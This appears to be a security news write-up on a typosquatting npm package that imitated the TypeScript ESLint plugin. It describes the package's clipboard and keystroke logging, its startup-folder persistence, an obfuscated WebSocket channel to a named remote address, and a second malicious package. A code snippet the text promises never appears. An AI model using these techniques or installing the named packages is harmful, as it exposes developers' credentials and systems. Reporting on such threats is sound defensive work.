Malicious npm Package Targets Popular TypeScript ESLint Plugin to Steal Data and Enable Remote Attacks
Cybercriminals exploit typosquatting to deploy a malicious npm package mimicking a popular TypeScript ESLint plugin. The attack compromises developer environments by exfiltrating sensitive data, logging keystrokes, monitoring clipboard activity, and enabling remote command execution. With a secondary payload still active, this persistent threat highlights the need for enhanced security measures and vigilance in the open-source ecosystem.
Malicious Typosquatting npm Package Exploits Popular TypeScript ESLint Plugin to Exfiltrate Data and Enable Remote Exploitation
A sophisticated cyberattack targeting the open-source ecosystem has emerged, exploiting the trust developers place in popular npm packages. Using a technique known as typosquatting, attackers have managed to deploy a malicious npm package mimicking the widely-used TypeScript ESLint plugin, @typescript-eslint/eslint-plugin. This malicious version, @typescript_eslinter/eslint, was designed to deceive developers into installing it by exploiting common typos and subtle name variations. Once installed, the malicious package carried out a range of harmful activities, from data exfiltration to remote code execution.
The attack chain began with the typosquatting package, which was published on npm on November 17th. Within a mere two weeks, 43 versions of the package were released, a tactic aimed at evading automated detection systems. While the primary package was eventually removed on December 1st, its impacts were felt across the developer community, as it silently compromised a wide range of systems.
Clipboard and Keyboard Logging: A Stealthy Data Theft
Upon installation, the malicious package employed advanced techniques to monitor and capture sensitive data. Using the clipboard-event package, it tracked any changes to the clipboard, secretly logging copied content, which could include passwords, API keys, or other sensitive information (Socket Research Team, 2024). Additionally, the package implemented global keyboard listeners using the node-global-key-listener library, capturing keystrokes as developers typed, further exfiltrating passwords, credentials, and other confidential data without the user’s knowledge.
Persistence Mechanism: Ensuring Long-Term Access
To guarantee the persistence of the attack, the malicious package deployed a .bat file to the Windows Startup folder. This method ensured that the malicious script would execute every time the system restarted, embedding itself deeply in the affected environment. This persistent presence allowed the attackers to maintain control over compromised systems, even after restarts.
Real-Time Remote Control via WebSocket
One of the most alarming aspects of the attack was the use of a WebSocket connection. The package established a connection to a remote server, ws://135.181.226.254:5051, located in Finland (Socket, 2024). This real-time communication allowed attackers to dynamically issue commands and exfiltrate data, enabling them to maintain continuous access to compromised systems. The attackers could also bypass basic security measures by obfuscating the server’s IP address using techniques like Base64 encoding and string reversal, making it more difficult for automated security tools to detect the malicious activity.
The Secondary Payload: Continued Threats
In addition to the primary malicious package, the attackers published a secondary payload, @typescript_eslinter/prettier, which is still active on npm. This secondary package is designed to enhance the attack by further spreading the malicious functionality of the first package. While the main typosquatted package has been removed, the persistence of the secondary package underscores the ongoing threat posed by such supply chain attacks. As of now, this secondary payload remains live on npm, continuing to pose risks to developers worldwide (Socket Research Team, 2024).
Disabling Trusted Tools and Exploiting Developer Workflows
A particularly insidious part of the attack was the package’s ability to disable trusted development tools, such as ESLint, by executing a command that deletes the legitimate eslint process. This prevented developers from using trusted linting processes, allowing the attackers to replace these with their own malicious code, further compromising the development environment.
Additional Code Analysis: How the Malicious Package Operates
The @typescript_eslinter/eslint package executes a variety of commands on compromised systems, including the deletion of legitimate linting processes like ESLint. For example, the following code snippet is used to remove the ESLint process:
The Wider Implications: A Call for Vigilance
This attack highlights the increasing sophistication of supply chain attacks targeting open-source tools and the reliance developers place on trusted packages. The wide adoption of @typescript-eslint/eslint-plugin made it an ideal target for attackers looking to exploit typosquatting. According to research by Socket (2024), the attack impacted a large number of systems and compromised sensitive project data, potentially leading to credential theft, unauthorized access to private repositories, and further exploitation of the compromised systems.
The ongoing threat posed by the secondary payload, @typescript_eslinter/prettier, serves as a stark reminder of the persistent risks in the open-source ecosystem. Developers must adopt strict security practices, including vigilant package validation and typosquatting detection. Tools like Socket for GitHub and the Safe npm CLI are essential for identifying and mitigating such risks by flagging suspicious packages and blocking supply chain attacks.
Conclusion
The recent typosquatting attack leveraging the @typescript_eslinter/eslint package serves as a potent example of how attackers can exploit the trust inherent in the open-source ecosystem. While the initial package has been removed, the persistence of the secondary payload, along with the sophisticated techniques used in the attack, highlights the evolving nature of supply chain threats. Developers must remain proactive in safeguarding their environments, using specialized tools to detect vulnerabilities before they can be exploited (Socket Research Team, 2024).